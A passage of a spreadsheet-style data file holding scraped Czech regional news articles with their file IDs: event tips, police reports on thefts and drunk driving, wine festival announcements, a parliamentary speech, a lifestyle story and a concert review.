    <t>Tipy Deníku – Liberecko Podzimní dušičkování s pohádkou a dílnami Kdy: neděle 3. listopadu od 14:30 do 17 hodin Kde: Zauhlovací a vodárenská věž (Zauhlovačka) Proč přijít: Přijďte oslavit podzim a svátek dušiček zase trochu jinak, v Zauhlovačce – pohádkou, výrobou lampionu, kafem a dýňovým Cheesecakem a k tomu hraní Lenky Elky s úžasně melancholickým hlasem. Večer s Davidem Matáskem Kdy: pátek 1. listopadu Kde: Knihkupectví a antikvariát Fryč Proč přijít: David Matásek jako další host zábavných talk show u Fryče. Po skončení pořadu bude následovat autogramiáda. Maluj a relaxuj Kdy: neděle 3. listopadu od 10 hodin Kde: Palác Liebieg Za kolik: 500 Kč Proč přijít: Malba dle předlohy či fantazie s Magdalenou Nevrlou. Veškeré pomůcky v ceně. Přihlášení a platba přes evstupenku nebo na recepci. Muzeum od půdy ke sklepům Kdy: neděle 3. listopadu od 18 hodin Kde: MUZA – Severočeské muzeum v Liberci Za kolik: 100 Kč Proč přijít: Na místa, kam se běžný návštěvník muzea nedostane, vás zavede ředitel MUZA – Severočeského muzea Jiří Křížek . Kapacita prohlídky je omezená, proto doporučujeme rezervaci na recepci muzea. Běh na Českou chalupu – memoriál Mirko Gräfa Kdy: sobota 2. listopadu od 8 do 13:15 hodin Kde: Lidové sady, Liberec Za kolik: 200 Kč Proč přijít: Běh na Českou chalupu je dlouhý 2500 m, během kterých závodníci překonají převýšení 248 m. Závod je dostatečně náročný na to, aby prověřil i vrcholové sportovce, nikoliv však natolik, aby se jej nemohl zúčastnit kdokoliv. Součástí závodu jsou i dětské běhy na 600 m a 350 m k vodárně. Běhá se každoročně první sobotu v listopadu na počest bývalého českého reprezentanta, trenéra a zakladatele závodu M. Gräfa. Medový den v Turnově Kdy: neděle 3. listopadu od 10 do 16 hodin Kde: Kulturní centrum Střelnice Turnov Za kolik: 70 Kč Proč přijít: Přijďte si užít medový den, dozvědět se něco nového ze světa včel, ochutnat, co se z medu vyrábí a podpořit regionální včelaře. Těšit se můžete na různé druhy medu a medovin, medové menu a zákusky, medové pivo , svíčky a medovou kosmetiku. Po celou dobu Vám budou k dispozici včelaři, kteří zodpoví Vaše otázky. Pro děti je připravena medová stezka, živý úl, ukázky pomůcek, různé úkoly a dílničky. Pódium pak bude patřit loutkovému divadlu pro děti, hudebnímu workshopu a vystoupení irských tanců. Kastelánské prohlídky hradu Grabštejn Kdy: neděle 3. listopadu od 15 do 17:30 hodin Kde: hrad Grabštejn Za kolik: 320 Kč Proč přijít: Kastelánská prohlídka je prodloužená prohlídka interiéry (a někdy i exteriéry hradu), která se zaměřuje na konkrétní historické období či osoby z dějin hradu. Dozvíte se při nich mnoho informací i ze zákulisí (např. jak se tvoří obsah prohlídkové trasy) a dostanete se i do míst, kam běžně návštěvníky nepouštíme (třeba do zaniklé spojovací chodby mezi východním a severním křídlem). Zpřístupnění středověké věže Kdy: pátek 1. listopadu v 10.00 (do 3. listopadu) Kde: Státní zámek Lemberk Za kolik: 80 korun Proč přijít: I během dušičkového víkendu se můžete až do 14 hodin přijít pokochat úchvatným výhledem do okolí z mohutné věže lemberského zámku. (ph) více tipů na www.liberecky.denik.cz</t>
  </si>
  <si>
    <t>20241101_546_3240996567_0389ed7857f4f248d898.html</t>
  </si>
  <si>
    <t>0389ed7857f4f248d898</t>
  </si>
  <si>
    <t>Domažličtí kriminalisté dopadli tři podezřelé ze série majetkové trestné činnosti</t>
  </si>
  <si>
    <t>Domažličtí kriminalisté dopadli tři podezřelé ze série majetkové trestné činnosti Foto: Policie ČR Plzeňský kraj Domažlickým kriminalistům se podařilo objasnit hned několik případů majetkové trestné činnosti. Z té jsou obviněni tři muži, kteří měli spáchat 11 skutků, a to buď samostatně, nebo ve formě spolupachatelství. Nyní je již jeden z obviněných ve výkonu trestu odnětí svobody pro jinou trestnou činnost, druhý byl vzat do vazby a třetí je stíhán na svobodě. Policistům z oddělení obecné kriminality Domažlice se na základě operativně pátrací činnosti, místní a osobní znalosti podařilo objasnit několik případů majetkové trestné činnosti. Policejní vyšetřovatel tak mohl zahájit trestní stíhání proti třem mužům z Domažlicka , kteří páchali trestnou činnost na různých místech v okrese Domažlice . Trestné činnosti, a to převážně majetkové, se měli obvinění dopouštět nejméně od poloviny měsíce června letošního roku až do začátku měsíce října. Celkem měli spáchat 11 skutků, a to buď samostatně, nebo ve formě spolupachatelství. Proti nejstaršímu, devětatřicetiletému muži policejní komisař vznesl obvinění ze spáchání přečinů krádež a porušování domovní svobody. Obviněný měl neoprávněně vstoupit na cizí pozemek, vypáčit vstupní dveře od stavení buňky sloužící jako sklad a odcizit několik lahví alkoholu . Následně pak měl vniknout i do další buňky, která slouží jako kancelář. Z té měl odcizit tiskárnu a za pomoci zde nalezených klíčů vniknout do skladovací haly, ze které měl ukradnout nákladní vozidlo, nářadí, kempingové vybavení, nabíječku na autobaterie, startovací vozík a tím způsobit škodu za téměř 200 tisíc korun. Další trestné činnosti se měl dopustit společně po předchozí domluvě s dalším obviněným. Spolu měli vniknout do jedné chaty a odcizit několik desítek lahví alkoholu , historické a sběratelské předměty, sadu na grilování, kosmetické přípravky, klíče od garáže, sérii knížek, vše v hodnotě přesahující částku 70 tisíc korun. Další věci, jako např. obrazy, lahve s alkoholem , oblečení, vše ve výši přes 145 tisíc korun, si na uvedeném místě měli připravit k následnému odcizení, k čemuž však již nedošlo. Dalším z obviněných, proti kterému bylo zahájeno trestní stíhání pro zločin legalizace výnosů z trestné činnosti a přečinů krádež a maření výkonu úředního rozhodnutí a vykázání, je třicetiletý muž. Ten si měl koupit za celkovou částku 14 tisíc korun od devětatřicetiletého obviněného výše uvedený odcizený nákladní automobil i s kradenými věcmi. O tom, že vozidlo včetně věcí v něm uložených pochází z trestné činnosti, měl vědět. Dále se měl za použití násilí vloupat do haly v jednom zemědělském areálu a odcizit různé nářadí, startovací vozík a z nádrže zde odstaveného traktoru i nejméně 50 litrů motorové nafty a tím způsobit škodu přes 21 tisíc korun. Také měl odcizit z přízemí neuzamčeného bytového domu volně stojící jízdní kolo v hodnotě 6 tisíc korun, ze stodoly pak dva kusy hliněných žebříků a způsobit tak škodu za téměř 7 tisíc korun. Na místě si měl ještě přichystat k odcizení i další nástroje a nářadí v hodnotě kolem 10 tisíc korun. Ke krádeži těchto věcí však již nedošlo. Minimálně třikrát pak měl řídit motorové vozidlo, a to i přesto, že má uložený trest zákaz činnosti, spočívající v zákazu řízení motorových vozidel. Třetím obviněným je devětadvacetiletý muž, proti kterému zahájil vyšetřovatel trestní stíhání pro přečiny krádež a porušování domovní svobody. Ten se kromě trestné činnosti, kterou měl spáchat společně s nejstarším obviněným, měl dopustit i další krádeže. Ze zahrady měl majiteli odcizit slunečníky, kovové nájezdy na auto, měděný džbán a způsobit tak škodu přesahující částku 8 tisíc korun. V současné době je již nejstarší z obviněných ve výkonu trestu odnětí svobody pro jinou trestnou činnost, druhý, třicetiletý obviněný byl vzat do vazby a třetí z obviněných mužů je stíhán na svobodě. por. Bc. Barbora Šmaterová, DiS. Policie ČR Foto: Policie ČR Autor: Pavel Jaňurek Autor person Pavel Jaňurek Rubrika transition_slide Hlavní zprávy</t>
  </si>
  <si>
    <t>20241101_547_3336217112_8642b6750eb198d8df6f.html</t>
  </si>
  <si>
    <t>8642b6750eb198d8df6f</t>
  </si>
  <si>
    <t>Svatomartinský Mikulov</t>
  </si>
  <si>
    <t>Svatomartinský Mikulov Odkaz byl zkopírován Foto: vinazmoravyvinazcech.cz Přijďte si užít svatomartinské husičky, víno a jarmark do Mikulova . Těšit se můžete na bohatý kulturní program, svěcení vína , svatomartinský košt, soutěže pro rodiny s dětmi, výtvarný workshop pro děti, vyprávění příběhů o sv. Martinovi , vystoupení cimbálových muzik a další. Kompletní harmonogram naleznete v tištěném programu (k vyzvednutí v TIC Mikulov) nebo na našem webu. Reklama Svatomartinský Mikulov se koná od 8. do 16. listopadu. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_548_3278560838_45cd8bcad708e0fcbb4a.html</t>
  </si>
  <si>
    <t>45cd8bcad708e0fcbb4a</t>
  </si>
  <si>
    <t>Svatomartinský košt 2024</t>
  </si>
  <si>
    <t>Svatomartinský košt 2024 Zveme vás na degustaci mladých a Svatomartinských vín ročníku 2024 v sobotu 9. 11. 2024 od 12.00 hod. Reklama Pojďte s námi prozkoumat chuťové nuance letošních mladých a statomartinských vín, více než 20 druhů, zastoupená vinařství – Vinofol – Novosedly , ZD Sedlec – Sedlec u Mikulova , Víno Blatel – Blatnička , Bronislav Vajbar – Rakvice , Vladimír Tetur – Velké Bílovice . Vstupné 50 Kč (volná degustace všech vín), záloha za degustační svatomartinskou skleničku – 50 Kč, občerstvení k vínu zajištěno. Vinotéka za kapličkou, Lenka a Radek Maloň Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_549_3240985669_8a68a5b7b3495809a0af.html</t>
  </si>
  <si>
    <t>8a68a5b7b3495809a0af</t>
  </si>
  <si>
    <t>Studenti UJEP bodují v soutěžích</t>
  </si>
  <si>
    <t>Studenti UJEP bodují v soutěžích Ústí n. L. Ateliér Sklo Fakulty umění a designu UJEP v Ústí n. L. zabodoval v prestižních soutěžích. Na podzim uspěla studentka Lenka Holubcová se svým setem na víno v preselekci prestižního ocenění Stanislav Libenský Award a student Jan Čihák vytvořil cenu pro Evropský týden udržitelného rozvoje UJEP z recyklovaného skla. Ateliér Sklo Fakulty umění a designu Univerzity Jana Evangelisty Purkyně v Ústí nad Labem (UJEP) se v rámci přehlídky Designblok představil výstavou vybraných studujících s názvem Mass &amp;amp; Space, kde reflektoval svůj dlouhodobý zájem o tradiční sklářské řemeslo a jeho inovace. Na Designbloku 2024 sklízel ocenění také vedoucí ateliéru Marcel Mochal s design studiem LLEV, které založil společně s Evou Mochalovou. DESIGNBLOK AWARDS 24 v kat. Impakt získali za spolupráci s tradičními českými výrobci sklárnou Harrachov a producentem perličkových ozdob Rautis. Studio LLEV v tomto roce získalo také prestižní cenu ELLE DECORATION INTERNATIONAL DESIGN AWARD, kde se stalo vítězem v kategorii Udržitelný design za kolekci svítidel Symbioosa pro Lasvit. (kos)</t>
  </si>
  <si>
    <t>8250</t>
  </si>
  <si>
    <t>20241101_55_3264608823_a70d517fdc477f8f0e30.html</t>
  </si>
  <si>
    <t>a70d517fdc477f8f0e30</t>
  </si>
  <si>
    <t>Balaštíková (ANO): Vy jste zvedl cenu potravin! A vy jste zvedl i cenu másla!</t>
  </si>
  <si>
    <t>Balaštíková (ANO): Vy jste zvedl cenu potravin! A vy jste zvedl i cenu másla! Projev na 117. schůzi Poslanecké sněmovny ČR 1. listopadu k vládnímu návrhu zákona, kterým se mění zákon č. 155/1995 Sb., o důchodovém pojištění. Tak ještě jednou. Pane ministře Výborný, prostřednictvím pana předsedajícího. (Zvýšeným hlasem.) Role faráře by vám šla ohromně! Vy umíte (důrazně) tak otočit to, co člověk říká, že je málokdo schopen vám sekundovat. Já se na vás učím. Děkuju. Já jsem tady od cenotvorbě vůbec nehovořila. Já jsem hovořila o tom, (Zvýšeným hlasem.) jak kroky ministrů za KDU-ČSL změnou společné zemědělské politiky, odsouhlasením konsolidačního balíčku zvedly nákladovost u prvovýrobců, zpracovatelů a všech, i u obchodníků, a oni museli tyhlety náklady promítnout do ceny potravin. (Důrazně) Vy jste zvedl cenu potravin! A vy jste zvedl i cenu másla! Nikdo vám neříkal, abyste řekl, že mají obchodníci prodávat levněji. Mají tam zajímavou marži, ale já jsem hovořila (důrazně) o tom, co je náplní ministra zemědělství, a to je to, starat se o svůj resort (důrazně) tak, aby tam byla nákladovost nízká a aby tam byla konkurenceschopnos. A (důrazně) tu vy snižujete! To (důrazně) vy jste ten, který mířil na velké! (Z pléna: Psssst...) Původně jste si myslel: sestřelím Babiše. Potom (jste?) chtěl sestřelit další, protože to byli agrobaroni! A nakonec jste sestřelil ty střední, kteří jsou (zvýšeným hlasem) rádi, když si to ti velcí od nich koupí, protože chtějí, aby jejich zemědělské podniky dál fungovaly, aby tam lidé pracovali a aby tahle země byla soběstačná ve výrobě potravin! A to (důrazně) vy jste likvidátor toho všeho, máte na starosti venkov a posíláte ho do kolen! Tak to je! Tak si tady nenalévejme úplně jiné víno , protože, vážený pane ministře, ono vám v čistém vínu plavek kus korku! Tento článek je uzamčen Po kliknutí na tlačítko "odemknout" Vám zobrazíme odpovídající možnosti pro odemčení a případnému sdílení článku. Přidejte si PL do svých oblíbených zdrojů na Google Zprávy . Děkujeme. Foto: Hans Štembera Popisek: Poslankyně Margita Balaštíková Rubrika transition_slide Politici voličům</t>
  </si>
  <si>
    <t>20241101_550_3241003280_877f334dca714e182334.html</t>
  </si>
  <si>
    <t>877f334dca714e182334</t>
  </si>
  <si>
    <t>Aneta (33): Sestra vždy byla chlouba naší rodiny. Moje úspěchy nikoho nezajímaly</t>
  </si>
  <si>
    <t>Aneta (33): Sestra vždy byla chlouba naší rodiny. Moje úspěchy nikoho nezajímaly Aneta vždy žila ve stínu své úspěšné sestry, která vystudovala univerzitu s červeným diplomem, má kariéru a rodinu. Aneta zatím šla za svým snem a fotí. Jenže to je povolání, které její rodiče neberou vážně. Moje sestra Aneta byla naší chloubou. A já? Já byla ostudou. Stačilo se podívat na staré fotoalbum – všichni se smáli a Aneta vždycky byla v centru pozornosti. Na vysvědčení samé jedničky, medaile, soutěže a pak prestižní vysoká škola... Vždycky věděla, co chce, a vždycky to dostala. Rodiče říkali, že se prostě snažila víc. A možná měli pravdu... Mohlo by Vás zajímat: Natálie (30): Moje sestra flirtuje s mým manželem. To nejhorší jsem se dozvěděla z omylem poslané zprávy Prý jsem byla líná Na rozdíl od ní jsem s obtížemi procházela z ročníku do ročníku. Nezajímala mě univerzita ani velké plány do budoucna. Raději jsem malovala, psala básně, toulala se s foťákem a snila o svobodě. Rodiče říkali, že jsem líná. Aneta se jen shovívavě usmívala. Vždycky si myslela, že ví všechno lépe. Když jsem bez většího nadšení odmaturovala a nedostala se na žádnou z vysokých škol, které mi rodiče vybrali, celá rodina to rychle přešla. Přestala jsem je zajímat. Když se Aneta měla stát právničkou, koho by zajímala neúspěšná dcera bez ambicí? Nikdy nedokázali pochopit, že jsem zkrátka nechtěla to, co oni. Že život, který mi vybrali, nebyl můj. Viděli ve mně někoho, kdo se ztratil, zatímco já jsem jen viděla svět jinak... Mohlo by Vás zajímat: Zuzka (29): Moje sestra je už přes rok nezaměstnaná a zvykla si, že ji živím. Moje trpělivost je u konce Na moji sestru byli všichni hrdí Když Aneta ukončila univerzitu s červeným diplomem, uspořádala se velká rodinná oslava. Všichni byli nadšení, že naše Aneta je právnička! A já? Seděla jsem v rohu s pohárem vína a poslouchala ty stejné chvály pořád dokola. Nikdo se ani nezeptal, jak se mám. Nikdo si nevšiml, že už dva roky vedu vlastní fotoateliér, mám klienty, projekty a vyhrávám soutěže. Pro ně to nemělo žádný význam. Být právničkou bylo něco. Fotografka? To znělo spíš jako koníček, něco, co jednou nechám. „ Aneta je úžasná! “ rozplývala se teta Helena. „ A co ty, Aničko? “ dodala a podívala se na mě blahosklonně. „ Jak to jde... s těmi tvými fotkami? Pořád to děláš? “ „ Ano, teto, pořád, “ odpověděla jsem s nuceným úsměvem. „ Mám i pár nových zakázek. “ „ To je fajn, fajn, “ přikývla a rychle se otočila k někomu jinému. Na takové rozhovory jsem si zvykla. Každý Anetin úspěch se slavil, zatímco ty moje byly sotva postřehnutelné. Nezáleželo na tom, co jsem dělala, vždy jsem byla v jejím stínu. Dokonce i když jsem se odvážila odjet na půl roku do Paříže na kurz fotografie, rodiče to považovali za „útěk před skutečným životem“. Ale já jsem tam konečně mohla dýchat. Daleko od hodnocení, srovnávání a věčných očekávání jsem začala nacházet sama sebe. Mohlo by Vás zajímat: Natálie (23): Obvinila jsem sestru, že ukradla peníze na rodinnou dovolenou. Skutečným viníkem byl někdo jiný Rodiče mě nikdy nedokázali pochválit Roky ubíhaly. Aneta se vdala a stala matkou. Její život běžel podle plánu jako švýcarské hodinky. Všichni věděli, co se u ní děje – povýšení, nové bydlení, dovolené na Karibiku . Každý její krok byl jako ta nejdůležitější zpráva a rodiče byli vždy pyšní. A já? No, já jsem dál šla svou cestou. Moje firma rostla. Začala jsem spolupracovat s většími klienty, vystavovala jsem fotky v galeriích, moje práce se objevily v časopisech. Občas jsem si říkala, jestli si toho rodiče někdy všimnou, jestli řeknou: „ Hele, Aničko, skvělá práce, opravdu si toho vážíme! “ Ale ten okamžik nikdy nepřišel. Byla jsem vždycky ta „druhá dcera“. S tím rozdílem, že už jsem ani nebyla jejich zklamáním. Stala jsem se neviditelnou... Mohlo by Vás zajímat: Nela (33): Návštěva u starší sestry je za trest. Má doma takový nepořádek, že se štítím pít ze skleničky Sestra o mně nevěděla nic Jednoho dne jsem Anetu náhodou potkala ve městě. Vídaly jsme se jen na rodinných setkáních, takže to bylo překvapení. Seděla jsem v kavárně, mluvila s klientem o novém projektu, když přišla Aneta. Byla oblečená v drahém kabátu a s kabelkou, která pravděpodobně stála víc než celé mé fotografické vybavení. Posadila se o pár stolů dál a já ucítila v žaludku ten známý svíravý pocit. To ponížení, které se vrátilo vždy, když jsem ji viděla. Po schůzce jsem šla za ní, nechtěla jsem, aby to vypadalo, že se jí vyhýbám. „ Aničko? “ zamračila se, jako by si nebyla jistá, jestli jsem to opravdu já. „ Co tady děláš? “ „ Měla jsem schůzku s klientem, “ odpověděla jsem s úsměvem. Podívala se na mě s náznakem překvapení. Poprvé jsem v jejích očích viděla něco, co jsem dřív neviděla – možná údiv... Možná dokonce respekt... „ S k lientem? “ zeptala se, jako by tomu nemohla uvěřit. „ Ano, víš, vedu fotografické studio. Dělám zakázky, výstavy, občas spolupracuji s časopisy. “ „ Vážně? “ pronesla opatrně, jako by se snažila tu informaci vstřebat. „ To jsem nevěděla... “ „ Ano, už několik let, “ odpověděla jsem klidně, i když ve mně rostla frustrace. Jak to mohla nevědět? Opravdu byla celá rodina tak slepá? „ To je... to je působivé, Aničko. Opravdu... “ řekla po chvíli. Pozorně jsem se na ni dívala. Zdálo se, že v jejím hlase je něco, co jsem neznala. Možná mě po letech viděla jinak. Snažila jsem se nedat najevo, jak moc pro mě ta slova znamenala. Mohlo by Vás zajímat: Berenika (36): Matka vždy protežovala sestru a její rodinu. Že to zajde až tak daleko, mě ale ani ve snu nenapadlo Konečně viděli, že jsem něco dokázala O pár týdnů později rodiče nečekaně navštívili mé studio. Měla jsem pocit, že jim Aneta něco řekla, protože jejich náhlý zájem byl příliš nápadný. Ukazovala jsem jim své práce, vyprávěla o tom, jak jsem firmu budovala, jak jsem začínala s malými zakázkami a teď spolupracuji s velkými klienty. Dívali se na mě, jako by mě poprvé viděli jako dospělého člověka, který něco dokázal. „ Netušil jsem, že se ti tak daří, “ řekl otec, když se díval na jednu z mých fotografií visících na stěně. „ Opravdu jsi mě překvapila, Aničko. “ Matka stála vedle, mlčela. Dívala se na fotky, jako by se snažila něco pochopit, něco, co jí dosud unikalo. Možná to bylo právě tohle. Možná fakt, že i když Aneta byla chlouba rodiny, já jsem si našla svou vlastní cestu. A přestože jsem nezískala tituly ani neměla vilu, vedla jsem si v životě dobře. Lépe, než si mysleli. Postupem času jsem se naučila, že jejich uznání nepotřebuju k tomu, abych se cítila naplněná. Ale v ten okamžik, když stáli v mém studiu a dívali se na výsledky mé práce, jsem poprvé cítila, že mě opravdu vidí. Možná konečně pochopili, že jsem víc než jen ta horší dcera... Další příběhy ze života → Mohlo by Vás zajímat: Renata (45): Po smrti rodičů jsem zdědila dům, peníze a sestru, kterou jsem nikdy neviděla Text byl zpracován na základě skutečného příběhu, fotografie je jen ilustrační. Máte podobnou zkušenost? Svěřte se nám se svým příběhem, napište na redakce@lifee.cz . Vítejte u Hanky Kynychové: Jako první jsme navštívili nový dům, ve kterém má konečně vlastní šatnu Autor: Jana Jánská Autor Jana Jánská</t>
  </si>
  <si>
    <t>20241101_551_3240982864_56149f86e39636e60bd1.html</t>
  </si>
  <si>
    <t>56149f86e39636e60bd1</t>
  </si>
  <si>
    <t>Šílenec za volantem. Znovu řídil opilý, těžce boural, musel pro něj vrtulník</t>
  </si>
  <si>
    <t>Šílenec za volantem. Znovu řídil opilý, těžce boural, musel pro něj vrtulník Hostinné Lidská bezohlednost nezná mezí. Smutným příkladem je 34letý šofér, který v sobotu vážně havaroval mezi Hostinným a Chotěvicemi . Řídil totiž opilý, stejně jako týden předtím. Policisté přistihli muže opilého a bez řidičského průkazu za volantem již 19. října v Hostinném Na Valech. Dechovou zkoušku na alkohol odmítl, až na služebně si to rozmyslel. „Nadýchal 2,17 promile,“ řekla policejní mluvčí Šárka Pižlová. V sobotu 26. října ve tři odpoledne, hříšník znovu řídil v opilosti auto. Navíc přitom havaroval. Za zatáčkou mezi Chotěvicemi a Hostinným vyjel na krajnici, dostal smyk, projel příkopem k náspu železniční tratě a narazil do břehu příkopu. „Utrpěl vážné poranění a musel být letecky transportován do Fakultní nemocnice v Hradci Králové ,“ uvedla mluvčí. (caj)</t>
  </si>
  <si>
    <t>25080</t>
  </si>
  <si>
    <t>20241101_552_3240979751_4835e2e7165e03fb6145.html</t>
  </si>
  <si>
    <t>4835e2e7165e03fb6145</t>
  </si>
  <si>
    <t>Ze čtvrtého patra hotelu letěl na ulici vařič i talíř</t>
  </si>
  <si>
    <t>Ze čtvrtého patra hotelu letěl na ulici vařič i talíř Pardubice Kuchařská show v hotelu skončila nečekaným výstupem, když vařič a talíř letěly z okna. I takového případy musí řešit Městská policie Pardubice . Nemusíte mít zrovna Michelinskou hvězdu na to, abyste věděli, že součástí receptů obvykle není vyhození vařiče z okna. V tomto případě jej následoval ještě talíř. Do čtvrtého patra hotelu, kde proběhla tato neobvyklá kuchařská show, zamířila hlídka Městské policie Pardubice . Strážníci zjistili, že recepturu připravovaného jídla narušil spolubydlící kuchaře, který se více než receptu věnoval konzumaci alkoholu . Nadýchal totiž 1,93 promile. Strážníci muži zajistili náhradní ubytování na záchytné stanici. Spolu s vyčíslením škody na hotelovém majetku ho nyní čeká také správní řízení. (pro)</t>
  </si>
  <si>
    <t>7700</t>
  </si>
  <si>
    <t>20241101_553_3240967878_f41b3066d00580be1724.html</t>
  </si>
  <si>
    <t>f41b3066d00580be1724</t>
  </si>
  <si>
    <t>Řidič na Zlínsku ujel se třemi promile 10 kilometrů, částečně jel v protisměru</t>
  </si>
  <si>
    <t>Řidič na Zlínsku ujel se třemi promile 10 kilometrů, částečně jel v protisměru zlínský Zlínsko – „Při jízdě ohrozil všechna protijedoucí vozidla, která kvůli němu musela uhýbat ze silnice, část úseku jel v protisměru. Jen shodou šťastných okolností se při jeho riskantní jízdě nikomu nic nestalo,“ popsala policejní mluvčí Monika Kozumplíková s tím, že oznámení o pravděpodobně opilém řidiči přijali policisté v úterý krátce po sedmé hodině ráno. „Čtyřiadvacetiletý muž, který jel několik kilometrů za nebezpečně jedoucím řidičem Škody Octavia z Fryštáku směrem do Zlína , sledoval jeho jízdu a informoval o ní policisty směřující na místo,“ doplnila mluvčí. ZAPARKOVAL VE ZDI Jízda řidiče skončila nárazem do zdi garáže u rodinného domu, kde se snažil zaparkovat. „Během cesty ohrozil minimálně čtyři protijedoucí řidiče. Po příjezdu policistů spal na sedadle řidiče,“ sdělila mluvčí. Když ho policisté probudili, dechová zkouška u něj ukázala 3,39 promile alkoholu . Přiznal se, že těsně před jízdou vypil nejasné množství tvrdého alkoholu . „Policisté zadrželi jeho řidičský průkaz a další jízdu mu zakázali. Za ohrožení pod vlivem návykové látky mu v případě odsouzení hrozí trest odnětí svobody až na tři roky, peněžitý trest a s určitostí teď nějakou dobu řídit nebude,“ uzavřela Monika Kozumplíková.</t>
  </si>
  <si>
    <t>24070</t>
  </si>
  <si>
    <t>20241101_554_3240967615_7c748141f44ba4294c00.html</t>
  </si>
  <si>
    <t>7c748141f44ba4294c00</t>
  </si>
  <si>
    <t>Svatomartinské slavnosti v Olomouci začnou za týden</t>
  </si>
  <si>
    <t>Svatomartinské slavnosti v Olomouci začnou za týden Projděte si program oslav, na nichž nebude chybět jídlo, víno a muzika olomoucký Magda Vránová Olomouc – ODRŮDY VÍN Oslavy svátku svatého Martina odstartují na Horním náměstí v pátek 8. listopadu v 11 hodin. Návštěvníci se mohou těšit na velký výběr svatomartinských vín moravských značek. Ochutnávat se budou čtyři desítky svatomartinských a mladých vín ročníku 2024. Například odrůdy Müller Thürgau, Muškát Moravský, Veltlínské červené ranné, Zweigeltrebe, Svatovavřinecké či Modrý Portugal. Vstupenkou na akci je symbolicky vinná sklenice s logem Svatomartinských slavností a samolepkou letošního ročníku. Lidé si kromě degustací mladých vín v centru města užijí také bohatý kulturní program. „V pátek i sobotu cinkání skleniček doplní cimbálová muzika v podání Cimbálovky Mirka Urubka a CM Bečva“, upřesnila Monika Řehulková, projektová manažerka pořadatelské společnosti Kulturní Olomouc . U prodejních stánků si mohou Olomoučané koupit svatomartinské občerstvení. V prodeji budou nejen husí stehna, uzeniny, sýry, ale i sladké dobroty a dárkové předměty. Vinný stan a prodejní stánky budou po oba dny k dispozici od 11 do 22 hodin. NA BÍLÉM KONI V sobotu 9. listopadu v 11 hodin začne program na Horním i Dolním náměstí žehnáním vína a vítáním „ Svatého Martina “ na bílém koni. Mladá vína se budou už od pátku ochutnávat také na Dolním náměstí, kde oslavy pořádá Olomoucká vinná společnost. „Součástí programu je také jarmark a historický kolotoč pro děti. Nebude chybět ani Svatomartinské menu,“ pozvala za pořadatele Jana Šubová z Olomoucké vinné společnosti. Na Dolním náměstí slavnosti probíhají v pátek a sobotu od 11 do 20 hodin.</t>
  </si>
  <si>
    <t>9770</t>
  </si>
  <si>
    <t>20241101_555_3240966675_ba65a4d368517edb5c04.html</t>
  </si>
  <si>
    <t>ba65a4d368517edb5c04</t>
  </si>
  <si>
    <t>Plný dům, show, překvapení, ale i zklamání</t>
  </si>
  <si>
    <t>Plný dům, show, překvapení, ale i zklamání Rocková skupina Kabát nemohla vystoupit v Olomouci , a tak pro své turné k 35 letům výročí zvolila zimní stadion v Prostějově . Sobotní koncert bavil, ale přinesl také překvapení i zklamání. Plný dům, kde hrají domácí zápasy hokejisté prostějovských Jestřábů, vyčkával příchodu skupiny okolo zpěváka Josefa Vojtka . Jak jinak odstartovat na zimním stadionu po zisku zlaté medaile z domácího mistrovství světa v hokeji než písničkou Brousíme nože. Dobré světelné efekty, které občas diváky až oslňovaly, zazněly samé hity, až na jeden. To bylo právě ono překvapení. Kabáti na závěr nezařadili oblíbený song Moderní děvče. Nezazněl, byť to každý čekal. Naopak nejvíce, podle očekávání, rozbouřila dav písnička Žízeň. Bez zbytečných průtahů Kabáti dávali jeden hit za druhým, jak u nich bývá zvykem – žádný předskokan, žádné dlouhé promluvy mezi písnička. Hodina a třičtvrtě rockové muziky. A to zklamání? Určitě fronty na pivo a zvolená značka. Slovenský Urpiner příliš nechutnal. Navíc oproti předchozím koncertům, které proběhly na olomouckém zimním stadionu, bylo více stánků, a tedy menší fronty. Hodnocení okem fanouška? Kabáti rozhodně nezklamali, udrželi si svůj standard a nabídli kvalitní zážitek, u kterého si člověk rád zazpívá. Povedený koncert.</t>
  </si>
  <si>
    <t>4130</t>
  </si>
  <si>
    <t>20241101_556_3240965590_d6323e9b042967b7eaa9.html</t>
  </si>
  <si>
    <t>d6323e9b042967b7eaa9</t>
  </si>
  <si>
    <t>Agresivní mladík v Zábřehu napadl strážníky. Skončil v poutech a v cele</t>
  </si>
  <si>
    <t>Agresivní mladík v Zábřehu napadl strážníky. Skončil v poutech a v cele Zábřeh Projíždějící hlídku městské policie kolem dvacáté hodiny zaujal ve Školské ulici muž bez trička. Když ho strážníci oslovili, začal na ně být agresivní a zaujal bojo vý postoj se slovy, že se jich nebojí. Strážníci vystoupili z auta a snažili se ho zklidnit. „Muž však pěstmi udeřil jednoho z nich do hrudníku a dále se jej snažil svalit na zem. V tu chvíli strážníci použili donucovací prostředky. Svedli jej na zem, přiložili služební pouta a převezli na zdejší policejní obvodní oddělení,“ popsal útok policejní mluvčí Libor Hejtman. Zadržený dvaadvacetiletý útočník nadýchal přes dvě promile alkoholu a měl i pozitivní test na THC. Po lékařském vyšetření putoval do cely. „Po vystřízlivění si od šumperských kriminalistů vyslechl sdělení o podezření ze spáchání přečinu násilí proti úřední osobě, za který mu hrozí trest odnětí svobody až na čtyři léta,“ dodal policejní mluvčí.</t>
  </si>
  <si>
    <t>4720</t>
  </si>
  <si>
    <t>20241101_557_3240963992_69fabc66859c7be03bb9.html</t>
  </si>
  <si>
    <t>69fabc66859c7be03bb9</t>
  </si>
  <si>
    <t>Mladá vína letos dorazí s bohatší chutí</t>
  </si>
  <si>
    <t>Mladá vína letos dorazí s bohatší chutí Otevírání svatomartinských vín se blíží, lidé se letos dočkají ještě před 11. listopadem. Vinaři si pochvalují kvalitu mladých vín a jejich plnou chuť. Radost jim kazí nižší výnosy, vína ročníku 2024 bude méně. PŘEMYSL SPĚVÁK Svatomartinská vína mohou letos zachutnat i lidem, kteří mladá vína jinak příliš nevyhledávají. Podle vinaře Bronislava Vajbara z Rakvic na Břeclavsku jsou totiž v chuti vyspělejší a mohutnější, než tomu bylo v předchozích ročnících. S kolegy se shodl na tom, že se na výsledku projevilo více slunce i to, že vinaři měli dostatek času vína připravit. Vinobraní totiž začalo asi o dva týdny dřív. RUBÍNOVÉ BARVY „Hrozny jsme sbírali díky vyzrálosti už od poloviny srpna. Vína jsou daleko více připravená do lahve, zklidněná. Budou svěží, ne však příliš kyselá. Ročník přál červeným ovocným vínům, která mají intenzivní barvu – vyzrálost hroznů byla vysoká,“ zhodnotil Vajbar. Petr Gondáš z 